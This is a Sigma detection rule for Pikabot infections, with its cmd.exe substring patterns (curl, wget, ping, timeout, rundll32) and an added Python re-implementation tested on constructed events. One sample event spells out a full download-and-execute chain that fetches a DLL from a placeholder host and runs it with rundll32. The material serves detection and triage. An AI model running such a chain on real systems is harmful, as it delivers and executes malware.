Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads: "curl" and "wget" are used to download extra payloads, "ping" and "timeout" are abused to introduce delays in the command execution, and "Rundll32" is used to execute malicious DLL files. In the observed Pikabot infections, a combination of the commands described above is used to orchestrate the download and execution of malicious DLL files.
Developed to detect an active or emerging threat. Prioritize investigation of any alerts and correlate with threat intelligence.
Events generated when a new process is spawned on the system. Covers command-line arguments, parent/child relationships, and process metadata.
detection:
    selection_cmd:
        CommandLine|contains|all:
            - 'cmd'
            - '/c'
    selection_pipes:
        CommandLine|contains:
            - ' & '
            - ' || '
    selection_commands_1:
        CommandLine|contains:
            - ' curl'
            - ' wget'
            - ' timeout '
            - ' ping '
    selection_commands_2:
        CommandLine|contains:
            - ' rundll32'
            - ' mkdir '
    condition: all of selection_*

False positive likelihood has not been assessed. Additional context may be needed during triage.
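The matching logic of the detection block above, as an added Python example that is not part of the rule or of any converter output: each selection_* block is evaluated as a case-insensitive substring test (Sigma's default for string fields) and the condition requires all four to match. The process-creation events are constructed samples; the last one is a benign-looking administrative one-liner that still satisfies every selection, the kind of hit the unassessed false-positive note refers to.

```python
"""Re-implementation of the Sigma rule's matching logic (added example)."""

# Substring lists copied from the rule's detection block.
SELECTION_CMD_ALL = ["cmd", "/c"]                      # contains|all
SELECTION_PIPES = [" & ", " || "]                       # contains (any)
SELECTION_COMMANDS_1 = [" curl", " wget", " timeout ", " ping "]
SELECTION_COMMANDS_2 = [" rundll32", " mkdir "]


def _contains_any(value: str, needles: list[str]) -> bool:
    """Sigma 'contains': at least one needle is a case-insensitive substring."""
    v = value.lower()
    return any(n.lower() in v for n in needles)


def _contains_all(value: str, needles: list[str]) -> bool:
    """Sigma 'contains|all': every needle is a case-insensitive substring."""
    v = value.lower()
    return all(n.lower() in v for n in needles)


def matches_pikabot_rule(command_line: str) -> bool:
    """condition: all of selection_* -> every block must match."""
    return (
        _contains_all(command_line, SELECTION_CMD_ALL)
        and _contains_any(command_line, SELECTION_PIPES)
        and _contains_any(command_line, SELECTION_COMMANDS_1)
        and _contains_any(command_line, SELECTION_COMMANDS_2)
    )


# Constructed process-creation events (not real telemetry); example.invalid is a placeholder host.
SAMPLE_EVENTS = [
    # Chain of the shape the description above refers to: download, delay, DLL execution.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c mkdir C:\Temp\x & curl -o C:\Temp\x\a.dll http://example.invalid/a.dll"
                    r" & ping 127.0.0.1 -n 5 & rundll32 C:\Temp\x\a.dll,Entry"},
    # Concatenated commands, but none of the download/delay/DLL commands: no alert.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c dir C:\Users & echo done"},
    # Benign build-script style line that still hits all four selections: a triage candidate.
    {"Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd /c mkdir C:\Temp\build & timeout 2 & echo ready"},
]


def triage(events: list[dict]) -> list[str]:
    """Return the CommandLine of every event the rule would alert on."""
    return [e["CommandLine"] for e in events if matches_pikabot_rule(e["CommandLine"])]
```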